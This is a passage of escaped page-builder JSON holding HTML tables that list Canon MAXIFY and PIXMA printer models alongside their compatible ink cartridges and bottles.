width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5070<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5170<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5370<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>MAXIFY MB5470<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-2700 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-2700XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E3170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E410<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP8770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6770<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iX6870<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-750XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-755XXL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2570S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG2577S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ac4d506\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"2645364\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62e0d92\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3570<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG3670<\\/p><\\/td><td width=\\\"208\\\"><p>CL-741 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-741XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740\\/CL-741 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-740XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MG7570<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751XL (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP160<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP170<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP180<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP228<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 